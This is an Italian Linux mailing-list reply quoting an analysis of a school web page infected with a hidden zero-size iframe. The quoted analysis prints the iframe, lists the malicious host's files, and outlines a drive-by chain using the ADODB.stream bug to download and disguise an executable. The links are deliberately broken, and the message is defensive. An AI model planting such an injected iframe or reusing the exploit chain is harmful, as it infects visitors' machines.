Ti ringrazio infinitamente. In effetti ciò proprio che ci domandavamo
nella lista in cui si discuteva il problema era proprio quello che dici tu
ovvero: come ha fatto ad arrivare li?
Francesca
> [premessa: i link che trovate nella mail sono stati alterati per evitare
> che qualcuno ci cliccasse sopra. Pertanto htttp e` da leggersi come
> http. Se proprio volete fare le prove almeno dovete cancellare una 't' :)]
>
> Francesca Campora wrote:
>> un trojan. Facendo ricerche abbiamo scovato che nel codice compariva:
>> <iframe src="http://b00gle.info/fa/?d=get"; width=0
>> heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
>> però questo si vede solo leggendo il source da Mozilla e non da Internet
>> Explorer.
>> Dove risiede veramente il codice che si vede con Mozilla?
>
> roadrunner/tmp> wget \
> htttp://www.bdp.it/scuolaprimariasanbortolo/html/linkutili.htm
>
> roadrunner/tmp> fgrep -i b00 linkutili.htm
> <iframe src="htttp://b00gle.info/fa/?d=get" width=0
> heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
> Transitional//EN">
>
> Quindi direi che si trova nella pagina. :)
>
> Il motivo per cui non lo vedi con explorer e` che forse "sistema" la
> pagina prima di fartela vedere, cosa che Mozilla non fa.
> La posizione del tag <iframe> e` illegale nel punto in cui si trova
> (almeno per quello che so io di html).
> La vera domanda che mi farei e` "come ha fatto a finire li' quel
> codice". Non credo che ce l'abbia messo FireWorks, che puo' avere molti
> difetti ma non quello di infettare le pagine, credo...
>
> Guardando piu' attentamente, si notano alcune peculiarita`:
> - b00gle.info punta ad un indirizzo ip coreano
> (www.hauteoverseaswedding.co.kr dice il server che ti da la pagina)
> - la pagina specifica (/fa/?d=get) contiene 6 iframe e nessun dato
> - 5 dei 6 iframe puntano a xpire.info, che e` lo stesso ip di b00gle, a
> file come
> blok.jpg [1]
> t3.htm [2]
> x.htm [3]
> runevil.htm [4]
> proc.htm [5]
>
> [1] non ho aperto il file, che e` un jpeg valido a giudicare
> dall'header, ma e` buffo che contenga tra le stringhe
> htttp://xpire.info/fa/aga.exe
> che e` un eseguibile per windows con un riferimento molto chiaro a
> KERNEL32.dll, non pensate? Io non sono mai riuscito a salvare un .jpg
> che puntasse ad un eseguibile sul web, sono anche un po' invidioso :P
> [2] e` un file html che tenta di caricare un curioso javascript
> (htttp://xpire.info/fa/ssload.js) che contiene una interessante funzione
> "getRealShell" che punta a "htttp://xpire.info/fa/ss.js". Questo ss.js a
> sua volta sfruttando il bug dell'ADODB.stream cerca di caricare con
> ActiveXObject... guarda caso il nostro amico aga.exe! Poi tenta di
> salvarlo come "C:\Program Files\Windows Media Player\wmplayer.exe".
> [3], [4] e [5] vengono lasciati al lettore che come me ha un quarto
> d'ora da perdere.
>
> - il sesto iframe punta a un ip russo per una pagina (/dl/adv121.php)
> che a naso prova ad eseguire un .jar in local security zone di IE.
>
> Morale: una pagina che tenta in tutti i modi possibili di trojanare il
> pc che vede il link. Spero che nessuno abbia cliccato da un IE non
> _ultimissima_ versione, compresi i lettori di questa lista.
>
> ciao!
> g.
> _______________________________________________
> Erlug mailing list
> Erlug@xxxxxxxxxxxxxx
> http://mail.erlug.linux.it/cgi-bin/mailman/listinfo/erlug
> -----------------------------------------------------------
> ErLUG webzine: http://erlug.linux.it
> Manuali FDL:
> LinuxFacile - http://www.linuxfacile.org
> Linux Da Zero - http://erlug.linux.it/linuxdazero/
> Connettivita' offerta da SincreTech S.r.l.
> -----------------------------------------------------------
>
|